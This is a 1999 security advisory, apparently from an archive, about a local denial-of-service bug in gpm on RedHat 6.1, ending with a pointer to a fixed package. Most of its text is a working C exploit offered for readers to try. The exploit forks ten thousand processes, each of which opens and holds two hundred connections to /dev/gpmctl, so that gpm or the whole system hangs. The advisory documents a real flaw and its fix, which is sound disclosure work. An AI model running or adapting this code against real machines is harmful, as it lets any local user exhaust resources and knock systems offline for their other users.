COMMAND

    gpm

SYSTEMS AFFECTED

    Linux

PROBLEM

    Tomasz Grabowski found the following. Some time ago he discovered
    a DoS bug in gpm as shipped with RedHat 6.1 (probably others). A
    regular user can simply DoS gpm or (in several circumstances) the
    whole system. In general the problem is that /dev/gpmctl is a
    stream (SOCK_STREAM) socket and you can flood it with many faked
    connections.

    If you want to play with it, try the attached code:

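    // FuckGpm    CADENCE of Lam3rZ    1999.11.23
    
    #include <stdio.h>
    #include <stdlib.h>     /* exit */
    #include <string.h>     /* strncpy */
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/un.h>
    
    #define GDZIE    "/dev/gpmctl"   /* "where": the gpm control socket */
    #define POLACZENIA 200           /* "connections": opened per process */
    #define SHITY   10000            /* number of child processes to fork */
    
    
    int main (void)
    {
     int a,b;
     struct sockaddr_un sun;
    
     sun.sun_family = AF_UNIX;
     strncpy (sun.sun_path, GDZIE, 30);
     printf ("OK...\n");
    
     /* parent exits; the work continues in the background child */
     if (fork ())
      exit (0);
    
     /* fork children; each child leaves the loop and goes on to connect */
     for (b = 0; b < SHITY; b++)
      if (fork () == 0)
       break;
    
     /* open POLACZENIA connections to the socket and never close them */
     for (b = 0; b < POLACZENIA; b++)
      {
       if ((a = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
         perror ("socket");
         while (1);
        }
    
       /* a failed connect is retried by undoing the loop increment */
       if (connect (a, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0)
        {
         perror ("connect");
         close (a);
         b--;
        }
      }
    
     /* stay alive so the connections remain open */
     while (1);
    }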

SOLUTION

    RedHat announced  that the  bug is  *FIXED* now  and everyone  can
    download a new version of this package from redhat-rawhide:

        /pub/Linux/redhat-rawhide/i386/RedHat/RPMS/gpm-1.19.2-1.i386.rpm